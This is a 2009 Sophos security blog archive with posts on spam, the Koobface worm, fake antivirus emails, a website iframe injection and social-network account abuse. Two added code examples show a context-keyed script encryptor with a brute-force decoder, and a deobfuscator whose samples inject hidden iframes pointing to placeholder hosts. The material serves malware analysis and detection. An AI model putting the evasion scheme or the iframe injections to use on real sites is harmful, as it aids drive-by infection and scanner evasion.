Sophos

Archive for November, 2009

You are today’s Macbook Air Winner !

SophosLabs was today's MacBook Air winner, according to the cyber criminals: our spam traps received loads of these congratulation emails today. The campaign spams out a malicious attachment which Sophos detects as Troj/Agent-LNC.

The email carries a zip file called winner.zip (detected as Troj/SpefZp-A). Here is a sample of the email:

The email pretends to come from "Media Service", and the typo in the message is plain to see. All of this marks it as obvious spam.

Sophos also proactively blocks the malware as Mal/FakeAV-AX.

Please don't click on any such fake congratulation emails, whether they land in your inbox or in your junk folder. If you ignore this warning and open the attachment thinking you have won a MacBook Air, the only prize you will receive is malware.


Koobface, new promises?

Koobface started life compromising Facebook and MySpace accounts. It then diversified to attack other social networking sites, including Twitter, Bebo, hi5, GeoCities and Friendster among the prominent ones.

Recently I came across what could possibly be the next iteration of Koobface, W32/Koobfa-O, which comes with Skype-harvesting functionality and some additional promises for the future. The new variant queries the Skype client on the compromised machine for various pieces of information about the victim, using the Skype API commands. The following screenshot shows a few of them:

W32/Koobfa-O collects information about the user such as HOMEPAGE, ABOUT, PHONE_MOBILE, PHONE_OFFICE, PHONE_HOME, CITY, COUNTRY, BIRTHDAY, FULLNAME and PSTN_BALANCE. The collected information is dumped into a file, packed as a RAR archive and either emailed or uploaded to a remote server. The worm then logs on to Skype chat as the user and starts conversations with friends who are online. The body of the worm contains snippets of conversation in 18 different languages, including some Asian languages. The following screenshot shows a snippet of the available conversation items in English:

I initially expected that there might be some lexical analysis being done to talk somewhat intelligently with the person at the other end of the chat, but it seems the worm pastes conversation pieces fairly randomly. This will be because the worm supports conversation in 18 languages, and it is too complicated to do lexical analysis for each of them; it is easier to just chat randomly. The worm also pastes a link to a compromised domain into the chat, and visiting it downloads W32/Koobfa-O.

W32/Koobfa-O also does something which hints at upcoming functionality:

Koobface already attacks Facebook and MySpace, so those two on the list are no big surprise. The list also contains new additions: blogger.com, wikipedia.org, youtube.com, yahoo.com and google.com. For now the worm doesn't do much except check whether some information (possibly credentials) exists for these domains. But is this a promise for the future? Clearly, as social networking and collaborative sites and tools multiply in number and grow in size, more malware will attempt to take advantage of them.


Twitter spam explosion

Starting early this morning, we have seen a major uptick in the use of Twitter links inside spam messages. Here are a few different variants. Most of the spam refers to online med sites, although a few campaigns tout making lots of money:

Following the links leads the user to "making-money-with-Google" or online pharmacy sites:

The Twitter accounts themselves appear to be legitimate and do not look to be bot-registered: they contain normal-looking tweets from the previous days and months. We are still looking into how the accounts were compromised. Certain malware, such as Koobface, steals Twitter credentials, and there is also the possibility of the account credentials being harvested through phishing.

As for regular users, it is now more important than ever to scrutinize the links you receive through Twitter. Today these links point to spam sites; tomorrow they could point to malware.


Katya, My Queen-To-Be

Do you think she's hot? Her name's Katya and she is the latest entry on my long list of "girlfriend-wannabes" / "potential one-night-stands". If my mum were to find out about her, she would definitely give me a hard backhand to the head for keeping such a great girl as Katya waiting.

Katya wrote me a really sweet email. However, I am appalled by her English. Let me share snippets of her declaration of love for me :)

1.   The agency of acquaintances has a contact to other agencies of acquaintances in other countries and I have received yours e-mail, therefore now I write to you.

I must get hold of her agencies of acquaintances, as they do have acquaintances who are pretty young things!

2.   I very much like walks on fresh air, I very much love the nature.

She can walk on air! I’m impressed n_n

3.   I like the sea and it is pleasant to float, in the summer I like to float and sunbathe.

Floating is easy. Dead people float too.

4.   I trust in family and love, and I search for the person to the one whom I will give all heat of my heart and with that whom I will be always together,

I feel for you too girlfriend!

5.   My person, clever also has strong spirit, he is kind and magnanimous and generous, he will be do something for me, and will know, that I will be do something for him.

Yup! I do fit her checklist :D

On that I will finish my blog entry. Katya, “if I have interested you then write to me.” :)


Malware, but only for a second in a day

Malware authors and software protectionists alike go to great lengths to obfuscate and contort their code in an attempt to hide or obscure its true nature [1,2]. The assumption is that if the code is difficult for a human or a machine to make sense of, analysis takes longer and the bad guys get a free run.

For the most part, such obfuscations (in particular in JavaScript) are relatively easy to unravel because they are static transformations [3]. The more complex encrypted forms require some form of script emulator (or your browser of choice) and a skilfully inserted alert() in place of eval(). However, a new form akin to the one-time-pad concept is now being deployed.

Script obfuscated and encrypted with contextual data


Such [quasi] one-time encryptors work by generating and encrypting the content on demand while choosing a key which is a function of the download environment, such as the Referer or the Last-Modified time. When the script is rendered in the browser, all the information needed to decode it correctly is present. However, by the time the script is submitted by a customer for analysis, that environment has long since been destroyed, making the script nearly impossible to decode.

Thus, examining the script on Friday 13th (13/11/2009) at 11:08:23 yields (poorly) decrypted content which does not render:

Script decoded with wrong key


Yet behold: on every 47th second of the 7th day of each month the script decodes correctly, revealing its secrets. Here, it decides whether to serve a (quite likely malicious) PDF or a Flash element:

Correctly decoded given context


Static offline analysis of such scripts is easily thwarted. However, any scanning engine which has access to the HTTP data stream should be able to cope, since at rendering time it has all the contextual data the script needs.

Brute-forcing aside, the only real way to tackle this problem is "just in time" detection (otherwise known as on-access scanning). Failing that, NoScript remains your best protection.
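To make the mechanism concrete, here is an added example (not code from the original post, and not taken from any real exploit kit) of a toy context-keyed encryptor and of the brute-force fallback mentioned above. The key schedule, which mixes in only the day of the month and the seconds of the clock, is an assumption chosen to mirror the 7th-day/47th-second case; the payload, the hostnames and the helper names are all constructed for the illustration.

```javascript
// Added example, not code from the original post or from any real kit: a toy
// context-keyed ("quasi one-time pad") script encryptor, and the brute force an
// analyst can fall back on once the original download context is gone.
// The key schedule (day of month + seconds of the clock) is an assumption chosen
// to mirror the 7th-day/47th-second case described in the post.

// Constructed payload standing in for the kit's "serve a PDF or a Flash object"
// decision. Any ASCII script would do.
const PAYLOAD =
  "if (navigator.plugins['Adobe Acrobat']) { document.write('<embed src=\"x.pdf\">'); }" +
  " else { document.write('<embed src=\"x.swf\">'); }";

// Keystream derived from the context string. FNV-1a seeds a xorshift32
// generator: deliberately toy-grade, since the point is the keying, not the cipher.
function keystream(material, length) {
  let h = 0x811c9dc5;
  for (let i = 0; i < material.length; i++) {
    h ^= material.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  let x = h || 1;
  const out = new Uint8Array(length);
  for (let i = 0; i < length; i++) {
    x ^= x << 13; x >>>= 0;
    x ^= x >>> 17;
    x ^= x << 5;  x >>>= 0;
    out[i] = x & 0xff;
  }
  return out;
}

// The "download environment": the part of it this toy key depends on.
function contextFromDate(date) {
  return { day: date.getUTCDate(), second: date.getUTCSeconds() };
}

// Repeating XOR against the context keystream, ciphertext as a hex string.
function encryptScript(script, day, second) {
  const ks = keystream(`${day}:${second}`, script.length);
  let hex = '';
  for (let i = 0; i < script.length; i++) {
    hex += (script.charCodeAt(i) ^ ks[i]).toString(16).padStart(2, '0');
  }
  return hex;
}

function decryptScript(hex, day, second) {
  const n = hex.length / 2;
  const ks = keystream(`${day}:${second}`, n);
  let text = '';
  for (let i = 0; i < n; i++) {
    text += String.fromCharCode(parseInt(hex.slice(2 * i, 2 * i + 2), 16) ^ ks[i]);
  }
  return text;
}

// Plausibility filter for a candidate decryption: printable ASCII plus at
// least one token that any browser-side dropper is going to use.
function looksLikeScript(text) {
  return /^[\t\n\r\x20-\x7e]+$/.test(text) &&
         /\b(document|eval|navigator|location|function)\b/.test(text);
}

// With only day-of-month and seconds feeding the key, the whole key space is
// 31 * 60 = 1860 candidates; trying them all offline is cheap. Returns the
// first candidate that looks like script, or null if the key is not in this space.
function bruteForce(hex) {
  for (let day = 1; day <= 31; day++) {
    for (let second = 0; second < 60; second++) {
      const text = decryptScript(hex, day, second);
      if (looksLikeScript(text)) return { day, second, script: text };
    }
  }
  return null;
}

// Stand-alone demo: served on the 7th at :47, analysed on Friday the 13th.
const served = contextFromDate(new Date(Date.UTC(2009, 10, 7, 0, 0, 47)));
const servedBlob = encryptScript(PAYLOAD, served.day, served.second);
const later = contextFromDate(new Date(Date.UTC(2009, 10, 13, 11, 8, 23)));
console.log('decodes in the wrong context?', looksLikeScript(decryptScript(servedBlob, later.day, later.second)));
console.log('brute force:', bruteForce(servedBlob));
```

The brute force only works because this toy key space is tiny; a kit that also folds in the Referer, the client IP or a per-request nonce pushes the search well beyond what an offline analyst can try, which is exactly why the post's recommendation is to scan in the HTTP stream, where the context is still available.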


Alert! Conflicker detected! … or is it?

Today we spotted a batch of messages arriving in our spam systems titled "Conflicker.B Infection Alert". The message goes like this:

Dear Microsoft Customer,

Starting 12/11/2009 the ‘Conficker’ worm began infecting Microsoft customers unusually rapidly. Microsoft has been advised by your Internet provider that your network is infected.

To counteract further spread we advise removing the infection using an antispyware program. We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus.

Please install attached file to start the scan. The process takes under a minute and will prevent your files from being compromised. We appreciate your prompt cooperation.

Regards,
Microsoft Windows Agent #2 (Hollis)
Microsoft Windows Computer Safety Division

The fact that the so-called antispyware program arrives attached to the email is a good indication that something is not right.

When the attached program was executed, it did not start a "free system scan" as claimed; instead it simply moved itself into other folders on the system and set itself up to start automatically at Windows startup.

Not surprisingly, the attached file is detected by Sophos as Mal/FakeAV-AX and the email message has also been blocked.

This is another example of the social engineering tricks malware authors use to capitalize on users' fears and entice them into running malicious software.

As always with email, think twice before running whatever arrives as an attachment.


Famous chip shop website battered by malicious Iframe injection

Before everybody peruses the ‘net in search of their fish supper this cold and wet Friday night.* Stop!!

Do you have adequate protection?

For your Internet browsing?

Earlier this week SophosLabs spotted that the website of the famous chip shop brand Harry Ramsden's had been haked by a malicious iframe. I codn't believe it when I saw that the mootools.js script on the site was infected with Troj/Iframe-DF, meaning that the website isn't the plaice to visit.

The injected code is all mushed up though so the malicious script may be floundering.

The obfuscated iframe points to a haked site in Germany which, when visited, redirects you to a fake Google site registered in the EU, triggering Troj/ObfJS-R.
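Puns aside, an injection like this is usually a static transformation, so it can be unravelled without running anything. The following is an added example (not code from the original post, and not the real mootools.js from the site) of a triage helper that peels the common unescape()/String.fromCharCode() wrappers off a JavaScript file and reports any iframe the decoded code would write. The stub library, the two injections and the hostnames in it are constructed placeholders.

```javascript
// Added example, not code from the original post and not the real mootools.js:
// a static triage helper for injected, obfuscated iframes. It rewrites the
// usual unescape()/String.fromCharCode() wrappers into plain string literals
// (no eval, nothing executed) and then lists the iframes in the decoded text,
// flagging those sized or styled to be invisible.

// A constructed, mootools-like stub with two constructed injections appended.
// Hostnames are placeholders, not the sites involved in the real incident.
const CLEAN_STUB = "/* MooTools (constructed stub) */\nvar MooTools = { version: '1.2.4' };\n";

const INJECTED_A =
  "document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fcompromised.example.de%2Fin.php%22" +
  "%20width%3D%220%22%20height%3D%220%22%20style%3D%22display%3Anone%22%3E%3C%2Fiframe%3E'));";

// The second injection is built from its plaintext so the char codes are right.
const TAG_B = '<iframe src="http://redirector.example.eu/g/" width=1 height=1></iframe>';
const INJECTED_B =
  'document.write(String.fromCharCode(' +
  Array.from(TAG_B, (c) => c.charCodeAt(0)).join(',') + '));';

const SAMPLE = CLEAN_STUB + INJECTED_A + '\n' + INJECTED_B + '\n';

// Peel static obfuscation layers. Each round turns unescape('...') and
// String.fromCharCode(...) calls into JSON string literals; repeat until
// nothing changes, with a cap so a pathological file cannot loop forever.
function decodeStaticLayers(src) {
  let out = src;
  for (let round = 0; round < 8; round++) {
    const before = out;
    out = out.replace(/unescape\(\s*(['"])([^'"]*)\1\s*\)/g,
      (_, q, body) => JSON.stringify(unescape(body)));
    out = out.replace(/String\.fromCharCode\(\s*([\d\s,]+)\)/g,
      (_, codes) => JSON.stringify(String.fromCharCode(...codes.split(',').map(Number))));
    if (out === before) break;
  }
  return out;
}

// Find iframe tags in the decoded text (quotes may be JSON-escaped by now)
// and record the target plus whether the frame is hidden from the viewer.
function findIframes(decoded) {
  const hits = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(decoded)) !== null) {
    const attrs = m[1];
    const src = /\bsrc\s*=\s*\\?["']?([^"'\\\s>]+)/i.exec(attrs);
    const hidden = /\b(?:width|height)\s*=\s*\\?["']?[01]\b/i.test(attrs) ||
                   /display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs);
    hits.push({ src: src ? src[1] : null, hidden });
  }
  return hits;
}

// Verdict for one file: any iframe written from decoded strings is suspect,
// because a library like mootools.js has no business writing iframes at all.
function triage(src) {
  const iframes = findIframes(decodeStaticLayers(src));
  return { injected: iframes.length > 0, iframes };
}

console.log(JSON.stringify(triage(SAMPLE), null, 2));
```

Running it on the constructed sample reports both frames, each with its decoded target and a hidden flag. For a real incident the next step is the one the post describes: follow the first hop only in a sandbox, since the redirect chain is where the actual exploit code lives.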

I don't want to carp on about the responsibilities of webmasters and web hosters, but they really have to protect their sites as well as tuna them up.

All this talk of fish’n'chips has made me hungry for a chip butty.

*Apologies for the puntastic tabloid style of this post but it is Friday :)


Handing over your password is just an app away

I was checking my personal Twitter feed today and saw friends posting how long they’ve been tweeting along with a link. The tweet looked something like this:

"Tweeting for # years, # months, # weeks, # day, # hours, # minutes # seconds (MM DD, YYYY) How about you? <link>"

Being curious, I decided to investigate the link.

The first thing it does is ask for your screen name, while showing a bunch of ads for "How to get more Twitter followers". OK, not the best ads, but moving on. You enter the screen name, then hit Go. It looks up the name and gives an accurate date, but then it offers to tweet it for you. So you enter your username and password. Wait a minute. That would be handing over your password to an unknown entity.

I did some initial investigation of the URL. The domain has only been around two months and is hosted with a fairly dodgy source, a proxy hosting service. This is private hosting, so you can't see any info on the person or business who actually owns the site. Hmmm. Usually, legit sites don't mind having that info available. I also noticed it doesn't use OAuth, which many Twitter sites use to show they are trying to be legit. Again, seems suspicious.

But how many people have willingly sacrificed their passwords by using such seemingly benign tools, links or applications? They seem totally harmless, don't they? As I posted in my previous blog post here, there's great value to malware authors in getting that info. Now I'm not necessarily condemning this particular tool, which may be totally innocent, but I feel compelled to warn people not to just blithely hand over their passwords. PLEASE think about what you are doing, even if it seems like harmless fun.


November’s Patch-Tuesday roundup…

This month's "Patch Tuesday" includes 6 security updates, of which Microsoft has rated 3 as Critical (all remote code execution vulnerabilities) and 3 as Important (two remote code execution vulnerabilities and one denial of service).

Mention-worthy updates this month include MS09-065 and MS09-068.

MS09-065 addresses several vulnerabilities in the Windows kernel-mode drivers. The one of particular concern relates to specially crafted Embedded OpenType (EOT) fonts and could be exploited to run unauthorized code in the system context.

Most remote code execution vulnerabilities we see run in the user context, at the same privilege level as the currently authenticated user. If you are that user, all your files are at risk, but the system itself is reasonably safe (unless your administrator hasn't been adhering to best practices and has granted you administrative privileges, in which case you have pretty much granted the attacker's code access to the entire box). With this kernel-mode driver remote code execution vulnerability, the current user's privilege level is irrelevant: however unprivileged the current user is, the unauthorized code has unfettered access to the local system. Assuming, that is, the attacker doesn't destabilize the system and trigger a BSOD before their code runs. Kernel vulnerabilities have a habit of bringing down not just processes but entire boxes.

MS09-068 is mention-worthy as it addresses issues in Microsoft Word on both the Windows and Apple platforms. Windows users with automatic updates configured will receive the fix automatically, but Mac users will have to rely on the Microsoft Office update utility, Microsoft AutoUpdate, or go here, here or here to download the relevant update.

You can find the rest of our analysis here.

And, as always, if you’ve found our vulnerability posts to be valuable, or have some suggestions for how we can better serve you, please let us know at sophosblog@sophos.com


Controlling your info…by hijacking your group

I saw in the news today that Facebook groups are being hijacked through a design flaw. When a group is created on Facebook, you have the option of making it an open group (anyone can join) or a closed group (invitation only). A group then has an owner and an administrator. Usually they are the same person, but the role can be delegated. If the owner/admin no longer wishes to be part of the group, they can leave, but that means the group no longer has an owner, and anyone can then take ownership of the group to keep it going.

I am not going to debate whether this is a good or bad policy on the part of Facebook. What I want to talk about is the blatant hacking of the group "Control your info". While I understand their desire to "help", hacking and defacing groups on Facebook is hardly the way to go about it.

Once they had joined a group and taken it over, they would post the following message there:

"This means we control a certain part of the information about you on Facebook. If we wanted we could make you appear in a bad way which could damage your image severely.

For example we could rename your group and call it something very inappropriate and nasty, like “I support pedophile’s rights”. But have no fear - we won’t. We just renamed it Control Your Info. Because this is really all we want:

Think about the safety in your social media life to the same extent you do in your real life.

Watch the videoclip for more information or check out for more tips soon!

We promise to restore your group name and leave the group by the end of next week. Don’t worry - we won’t mess anything up.

Best regards”

What they are doing is really no different from a hacker gaining control of a group and defacing it. Two wrongs do not make a right. While this group may think they are "helping", they are in fact making themselves look just as bad as a black hat. Think about the hacker who "Rickrolled" a bunch of iPhones, which Graham posted about. Does it really make it right to hack into computers, phones and websites to "try to raise security issues"? Not in our books.